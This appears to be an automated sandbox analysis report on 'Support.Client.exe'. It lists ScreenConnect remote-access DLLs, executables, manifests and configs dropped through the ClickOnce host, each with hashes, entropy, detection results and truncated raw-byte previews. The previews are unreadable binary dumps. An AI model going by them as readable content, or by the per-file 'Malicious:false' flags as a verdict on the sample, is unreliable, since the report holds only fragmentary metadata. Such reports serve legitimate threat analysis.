                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..qF.qF.qF....qF.....qF....qF.<.B.qF.<.E.qF.<.C.qF....qF.#..qF.qG..qF.2.O.qF.2...qF.2.D.qF.Rich.qF.........................PE..L.....wc...............!.............!............@.......................................@.................................p...x....`..X............L.. )...p......`!..p............................ ..@............................................text...:........................... ..`.rdata...f.......h..................@..@.data........@.......,..............@....rsrc...X....`.......6..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):548864
                                                                                                                                                                                                                                                Entropy (8bit):6.031251664661689
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6144:7+kYq9xDsxaUGEcANzZ1dkmn27qcO5noYKvKzDrzL9e7eOJsXziIYjVtkb+vbHq+:7SHtpnoVMlUbHbBaYLD
                                                                                                                                                                                                                                                MD5:16C4F1E36895A0FA2B4DA3852085547A
                                                                                                                                                                                                                                                SHA1:AB068A2F4FFD0509213455C79D311F169CD7CAB8
                                                                                                                                                                                                                                                SHA-256:4D4BF19AD99827F63DD74649D8F7244FC8E29330F4D80138C6B64660C8190A53
                                                                                                                                                                                                                                                SHA-512:AB4E67BE339BECA30CAB042C9EBEA599F106E1E0E2EE5A10641BEEF431A960A2E722A459534BDC7C82C54F523B21B4994C2E92AA421650EE4D7E0F6DB28B47BA
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z............." ..0..X...........r... ........... ...............................D....@..................................r..O....................................q..8............................................ ............... ..H............text....V... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................r......H........B......................xq........................................{:...*..{;...*V.(<.....}:.....};...*...0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...*.*.*. ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X*...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D...*..{E...*..{F...*V.(<.....}E.....}F...*.0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...*.*.*. F.b# )UU.
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1216
                                                                                                                                                                                                                                                Entropy (8bit):5.1303806593325705
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:JdFYZ8h9onR+geP0Au2vSkcVSkcMKzpdciSkTo:3FYZ8h9o4gI0A3GVETDTo
                                                                                                                                                                                                                                                MD5:2343364BAC7A96205EB525ADDC4BBFD1
                                                                                                                                                                                                                                                SHA1:9CBA0033ACB4AF447772CD826EC3A9C68D6A3CCC
                                                                                                                                                                                                                                                SHA-256:E9D6A0964FBFB38132A07425F82C6397052013E43FEEDCDC963A58B6FB9148E7
                                                                                                                                                                                                                                                SHA-512:AB4D01B599F89FE51B0FFE58FC82E9BA6D2B1225DBE8A3CE98F71DCE0405E2521FCA7047974BAFB6255E675CD9B3D8087D645B7AD33D2C6B47B02B7982076710
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Core" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Core.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Configuration" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.0" />.. </dependentAssem
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1721856
                                                                                                                                                                                                                                                Entropy (8bit):6.639136400085158
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24576:gx5x94kEFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:gx5xKkEJkGYYpT0+TFiH7efP
                                                                                                                                                                                                                                                MD5:9F823778701969823C5A01EF3ECE57B7
                                                                                                                                                                                                                                                SHA1:DA733F482825EC2D91F9F1186A3F934A2EA21FA1
                                                                                                                                                                                                                                                SHA-256:ABCA7CF12937DA14C9323C880EC490CC0E063D7A3EEF2EAC878CD25C84CF1660
                                                                                                                                                                                                                                                SHA-512:FFC40B16F5EA2124629D797DC3A431BEB929373BFA773C6CDDC21D0DC4105D7360A485EA502CE8EA3B12EE8DCA8275A0EC386EA179093AF3AA8B31B4DD3AE1CA
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l............" ..0..>...........]... ...`....... ..............................[.....@................................./]..O....`...............................\..8............................................ ............... ..H............text....=... ...>.................. ..`.rsrc........`.......@..............@..@.reloc...............D..............@..B................c]......H.......t...h..............0....\........................................()...*^.()..........%...}....*:.().....}....*:.().....}....*:.().....}....*..s*...*..s+...*:.(,.....(-...*..{....*"..}....*J.(/........(0...&*:.(,.....(1...*..{2...*"..}2...*.0..(........(3......+.............(0...&..X....i2.*v.(,....s4...}.....s5...}....*v.{.....r...p(...+.....o7....*.0...........o8....+..o9......(...+&.o....-....,..o......*..........."........{..........o:...&.......(.....*....0..L...
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1982
                                                                                                                                                                                                                                                Entropy (8bit):5.057585371364542
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:JdFYZ8h9onRbggeP0AuEvSkcyMuscVSkcHSkcf5bdcadccdcckdTo:3FYZ8h9oygI0AbHMrGQAXRTFgTo
                                                                                                                                                                                                                                                MD5:50FC8E2B16CC5920B0536C1F5DD4AEAE
                                                                                                                                                                                                                                                SHA1:6060C72B1A84B8BE7BAC2ACC9C1CEBD95736F3D6
                                                                                                                                                                                                                                                SHA-256:95855EF8E55A75B5B0B17207F8B4BA9370CD1E5B04BCD56976973FD4E731454A
                                                                                                                                                                                                                                                SHA-512:BD40E38CAC8203D8E33F0F7E50E2CAB9CFB116894D6CA2D2D3D369E277D93CDA45A31E8345AFC3039B20DD4118DC8296211BADFFA3F1B81E10D14298DD842D05
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Windows" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Windows.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depen
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):61216
                                                                                                                                                                                                                                                Entropy (8bit):6.31175789874945
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:1536:SW/+lo6MOc8IoiKWjbNv8DtyQ4RE+TC6VAhVbIF7fIxp:SLlo6dccl9yQGVtFra
                                                                                                                                                                                                                                                MD5:6DF2DEF5E591E2481E42924B327A9F15
                                                                                                                                                                                                                                                SHA1:38EAB6E9D99B5CAEEC9703884D25BE8D811620A9
                                                                                                                                                                                                                                                SHA-256:B6A05985C4CF111B94A4EF83F6974A70BF623431187691F2D4BE0332F3899DA9
                                                                                                                                                                                                                                                SHA-512:5724A20095893B722E280DBF382C9BFBE75DD4707A98594862760CBBD5209C1E55EEAF70AD23FA555D62C7F5E54DE1407FB98FC552F42DCCBA5D60800965C6A5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...L............."...0.................. ........@.. ....................... ......3]....@.....................................O.......,............... )..............8............................................ ............... ..H............text........ ...................... ..`.rsrc...,...........................@..@.reloc..............................@..B........................H........S......................x.........................................(....*^.(.......a...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........(....(....(....(....r...p(....o....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s....( ...s....(!...*...0...........(".....(#.....($....s....%.o%...%.o&...%.o'...%s!...o(...%~....o)...}......(....o*...o+....(,.....@...%..(.....o-....s....}.....{...........s/...o0....s....}..
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):266
                                                                                                                                                                                                                                                Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):601376
                                                                                                                                                                                                                                                Entropy (8bit):6.185921191564225
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6144:r+z3H0n063rDHWP5hLG/6XixJQm16Eod7ZeYai1FzJTZJ5BCEOG6y9QsZSc4F2/Q:qzEjrTWPMLBfWFaSdJ5BeG6xs6/yRod
                                                                                                                                                                                                                                                MD5:20AB8141D958A58AADE5E78671A719BF
                                                                                                                                                                                                                                                SHA1:F914925664AB348081DAFE63594A64597FB2FC43
                                                                                                                                                                                                                                                SHA-256:9CFD2C521D6D41C3A86B6B2C3D9B6A042B84F2F192F988F65062F0E1BFD99CAB
                                                                                                                                                                                                                                                SHA-512:C5DD5ED90C516948D3D8C6DFA3CA7A6C8207F062883BA442D982D8D05A7DB0707AFEC3A0CB211B612D04CCD0B8571184FC7E81B2E98AE129E44C5C0E592A5563
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...{<............"...0.................. ... ....@.. .......................`.......x....@.................................=...O.... .................. )...@..........8............................................ ............... ..H............text...`.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................q.......H........H................................................................{D...*..{E...*V.(F.....}D.....}E...*...0..A........u1.......4.,/(G....{D....{D...oH...,.(I....{E....{E...oJ...*.*.*. }.o )UU.Z(G....{D...oK...X )UU.Z(I....{E...oL...X*...0..b........r...p......%..{D......%q4....4...-.&.+...4...oM....%..{E......%q5....5...-.&.+...5...oM....(N...*..{O...*..{P...*V.(F.....}O.....}P...*.0..A........u6.......4.,/(G....{O....{O...oH...,.(I....{P....{P...oJ...*.*.*. 1.c. )UU.
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):266
                                                                                                                                                                                                                                                Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2573
                                                                                                                                                                                                                                                Entropy (8bit):5.026361555169168
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:3FYZ8h9o5gI0AsHMrAXQ3MrTMrRGTDBTo:1YiW4AjEvEJ
                                                                                                                                                                                                                                                MD5:3133DE245D1C278C1C423A5E92AF63B6
                                                                                                                                                                                                                                                SHA1:D75C7D2F1E6B49A43B2F879F6EF06A00208EB6DC
                                                                                                                                                                                                                                                SHA-256:61578953C28272D15E8DB5FD1CFFB26E7E16B52ADA7B1B41416232AE340002B7
                                                                                                                                                                                                                                                SHA-512:B22D4EC1D99FB6668579FA91E70C182BEC27F2E6B4FF36223A018A066D550F4E90AAC3DFFD8C314E0D99B9F67447613CA011F384F693C431A7726CE0665D7647
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.WindowsClient" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.WindowsClient.exe" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Drawing" publicKeyToken="b03f5f7f11d50a3a" version="2.0.
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10074), with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):17866
                                                                                                                                                                                                                                                Entropy (8bit):5.954687824833028
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:384:ze1oEQwK45aMUf6FX9hJX9FX9R/QPIYM7Y7:zd6FX9hJX9FX9R/QPIN07
                                                                                                                                                                                                                                                MD5:1DC9DD74A43D10C5F1EAE50D76856F36
                                                                                                                                                                                                                                                SHA1:E4080B055DD3A290DB546B90BCF6C5593FF34F6D
                                                                                                                                                                                                                                                SHA-256:291FA1F674BE3CA15CFBAB6F72ED1033B5DD63BCB4AEA7FBC79FDCB6DD97AC0A
                                                                                                                                                                                                                                                SHA-512:91E8A1A1AEA08E0D3CF20838B92F75FA7A5F5DACA9AEAD5AB7013D267D25D4BF3D291AF2CA0CCE8B73027D9717157C2C915F2060B2262BAC753BBC159055DBDF
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <asmv1:assemblyIdentity name="ScreenConnect.WindowsClient.exe" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" type="win32" />.. <application />.. <entryPoint>.. <assemblyIdentity name="ScreenConnect.WindowsClient" version="24.2.10.8991" publicKeyToken="4B14C015C87C1AD8" language="neutral" processorArchitecture="msil" />.. <commandLine file="ScreenConnect.WindowsClient.exe" paramet
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):81696
                                                                                                                                                                                                                                                Entropy (8bit):5.862223562830496
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:1536:/tytl44RzbwI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7Yp7gxd:8/KukLdUpc
                                                                                                                                                                                                                                                MD5:B1799A5A5C0F64E9D61EE4BA465AFE75
                                                                                                                                                                                                                                                SHA1:7785DA04E98E77FEC7C9E36B8C68864449724D71
                                                                                                                                                                                                                                                SHA-256:7C39E98BEB59D903BC8D60794B1A3C4CE786F7A7AAE3274C69B507EBA94FAA80
                                                                                                                                                                                                                                                SHA-512:AD8C810D7CC3EA5198EE50F0CEB091A9F975276011B13B10A37306052697DC43E58A16C84FA97AB02D3927CD0431F62AEF27E500030607828B2129F305C27BE8
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P............"...0..@...........^... ...`....@.. .......................`......j.....@..................................^..O....`.. ............... )...@.......]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc... ....`.......B..............@..@.reloc.......@......................@..B.................^......H....... +..@2..................`]........................................(....*^.(.......;...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s>....(....(....(....(....(.....(....(......s....}B....s....}C....~@...%-.&~?.....<...s ...%.@...o...+.....@...s ...o...+......A...s!...o...+}D.......B...s"...o...+.......(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(*........(+...o,...(-...t....
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):266
                                                                                                                                                                                                                                                Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):87
                                                                                                                                                                                                                                                Entropy (8bit):3.463057265798253
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:/lqlhGXKRjgjkFmURueGvx2VTUz:4DRPAx2Kz
                                                                                                                                                                                                                                                MD5:D2DED43CE07BFCE4D1C101DFCAA178C8
                                                                                                                                                                                                                                                SHA1:CE928A1293EA2ACA1AC01B61A344857786AFE509
                                                                                                                                                                                                                                                SHA-256:8EEE9284E733B9D4F2E5C43F71B81E27966F5CD8900183EB3BB77A1F1160D050
                                                                                                                                                                                                                                                SHA-512:A05486D523556C75FAAEEFE09BB2F8159A111B1B3560142E19048E6E3898A506EE4EA27DD6A4412EE56A7CE7C21E8152B1CDD92804BAF9FAC43973FABE006A2F
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:......../...............................Microsoft Enhanced Cryptographic Provider v1.0.
                                                                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):55
                                                                                                                                                                                                                                                Entropy (8bit):4.306461250274409
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                                                                MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                                                                SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                                                                SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                                                                SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1835008
                                                                                                                                                                                                                                                Entropy (8bit):4.465435519119259
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6144:nIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNXdwBCswSb0:IXD94+WlLZMM6YFHp+0
                                                                                                                                                                                                                                                MD5:78A4AB2C1D7042F26D69DB9AA617F2A0
                                                                                                                                                                                                                                                SHA1:69431D43A5FE74051534DAB233E514FD0EA39975
                                                                                                                                                                                                                                                SHA-256:604AD447847AEEA10F95CC3BB3000F869BF120C22E849CE6C45D969B3344BB94
                                                                                                                                                                                                                                                SHA-512:72166FAFF9BAEABFA2833148574FCD478409AAF4A1A470198D9B0D1CC67A298EB977D3B74EDC7D23527012CB9D86B41A8523A975F81EDB7597D9CBF9D66529B0
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..4gT..............................................................................................................................................................................................................................................................................................................................................s$..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                Entropy (8bit):6.513985351641068
                                                                                                                                                                                                                                                TrID:
                                                                                                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                File name:Support.Client.exe
                                                                                                                                                                                                                                                File size:83'424 bytes
                                                                                                                                                                                                                                                MD5:35981eb47ca481b1cc8f4495da53685f
                                                                                                                                                                                                                                                SHA1:8d5601de3cfc67aca5748f50ddf9f6e63de708ce
                                                                                                                                                                                                                                                SHA256:32694b10b3f04d250b82cce2fc909dc70b074b060407b5ded5355e66f2793aa6
                                                                                                                                                                                                                                                SHA512:6b54e41246580e8eff03a6e6f5bf1e6729fc4e05195925d5903dc21e87734cb459422543b1d2ab0c5a428ea88ab38fa25b7aae14bb4ea9ff43554781014ab2a1
                                                                                                                                                                                                                                                SSDEEP:1536:ZoG6KpY6Qi3yj2wyq4HwiMO10HVLCJRpsWr6cdaxPBJYYz73xDb:jenkyfPAwiMq0RqRfbaxZJYYzR
                                                                                                                                                                                                                                                TLSH:BB835B43B5D18875E9720D3118B1D9B4593FBD110EA48EAF3398826E0F351D1AE3AE7B
                                                                                                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ycId...d...d.......n...............|.......A.......v.......v...m`..a...d...........e.......e.......e...Richd...........PE..L..
                                                                                                                                                                                                                                                Icon Hash:90cececece8e8eb0
                                                                                                                                                                                                                                                Entrypoint:0x401489
